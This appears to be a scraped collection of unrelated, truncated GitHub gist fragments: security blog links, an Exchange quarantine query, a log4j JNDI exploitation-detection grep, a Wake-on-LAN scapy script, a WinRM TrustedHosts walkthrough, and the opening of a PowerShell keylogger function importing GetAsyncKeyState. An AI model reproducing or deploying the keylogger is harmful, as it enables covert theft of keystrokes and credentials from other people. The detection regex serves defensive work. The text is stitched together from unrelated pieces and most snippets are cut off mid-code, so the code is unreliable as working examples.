| https://thedfirreport.com/ | |
| https://www.zerodayinitiative.com/blog/ | |
| https://codewhitesec.blogspot.com/ | |
| https://www.digitalshadows.com/blog-and-research/ | |
| https://blog.talosintelligence.com/ | |
| https://www.riskiq.com/blog/ | |
| https://www.sekoia.io/en/blog-sekoia-io/ | |
| https://www.nextron-systems.com/blog/ | |
| https://www.microsoft.com/security/blog/ | |
| https://blog.truesec.com/ |
| # Must be connected to Exchange Online | |
| # Gets all Quarantined messages from the last week | |
| # Results are grouped by recipient | |
| Get-MessageTrace -EndDate (Get-Date) -StartDate (Get-Date).adddays(-7) -Status Quarantined | | |
| Sort-Object -Property RecipientAddress | | |
| Format-Table -GroupBy RecipientAddress |
You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228
This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders
sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log
The PowerShell updatable help system is a useful, if not under-utilised, way to supply up-to-date support documentation for your module. While its implementation and ongoing support from Microsoft for native PowerShell modules is questionable (in my opinion) to begin with, it remains under-used and, in many cases, an unrecognised method of supplying updates to help documentation. This may be, in part, related to the complicated way in which PowerShell is
| from scapy.sendrecv import send | |
| from scapy.layers.inet import * | |
| from binascii import unhexlify | |
| import sys | |
| magic = '' | |
| for h in sys.argv[1].split(':'): magic += unhexlify(h); | |
| send(IP(dst="255.255.255.255")/UDP(dport=9)/Raw(load=(chr(0xff)*6 + magic*16))) |
Slides and code examples from my "Pythons Sinister Secrets" presentation.
The slide deck can be downloaded here.
https://github.com/MarkBaggett/MarkBaggett/blob/master/Python's%20Sinister%20Secrets%20SlideDeck.pdf
| # THIS CODE IS PROVIDED AS IS WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING ANY IMPLIED WARRANTIES OF | |
| # FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY, OR NON-INFRINGEMENT. | |
| #Requires -Modules @{ ModuleName="Microsoft.Graph.Authentication" ; ModuleVersion="2.15.0" } | |
| #Requires -Modules @{ ModuleName="Microsoft.Graph.DirectoryObjects"; ModuleVersion="2.15.0" } | |
| #Requires -Modules @{ ModuleName="Microsoft.Graph.Identity.SignIns"; ModuleVersion="2.15.0" } | |
| #Requires -Modules @{ ModuleName="Microsoft.Graph.Applications" ; ModuleVersion="2.15.0" } | |
| #Requires -Modules @{ ModuleName="Microsoft.Graph.Users" ; ModuleVersion="2.15.0" } | |
| <# |
| #requires -Version 2 | |
| function Start-KeyLogger($Path="$env:temp\keylogger.txt") | |
| { | |
| # Signatures for API Calls | |
| $signatures = @' | |
| [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] | |
| public static extern short GetAsyncKeyState(int virtualKeyCode); | |
| [DllImport("user32.dll", CharSet=CharSet.Auto)] | |
| public static extern int GetKeyboardState(byte[] keystate); | |
| [DllImport("user32.dll", CharSet=CharSet.Auto)] |
| ## Hey folks, this is just a quick walkthrough on modifying the trusted hosts property in WSMAN using Powershell | |
| # By default PowerShell loads a PSDrive for the WinRM service | |
| # We modify the trusted hosts property using the Set-Item cmdlet | |
| Set-Item WSMan:\localhost\Client\TrustedHosts -value 192.168.1.13 | |
| #This sets the value to 192.168.1.13, it also overwrites any existing values | |
| # If you want to set a subnet you can use the PowerShell wildcard character | |
| Set-Item WSMan:\localhost\Client\TrustedHosts -value 192.168.1.* |
| #requires -version 2 | |
| <# | |
| .SYNOPSIS | |
| <Overview of script> | |
| .DESCRIPTION | |
| <Brief description of script> | |
| .PARAMETER <Parameter_Name> | |
| <Brief description of parameter input required. Repeat this attribute if required> |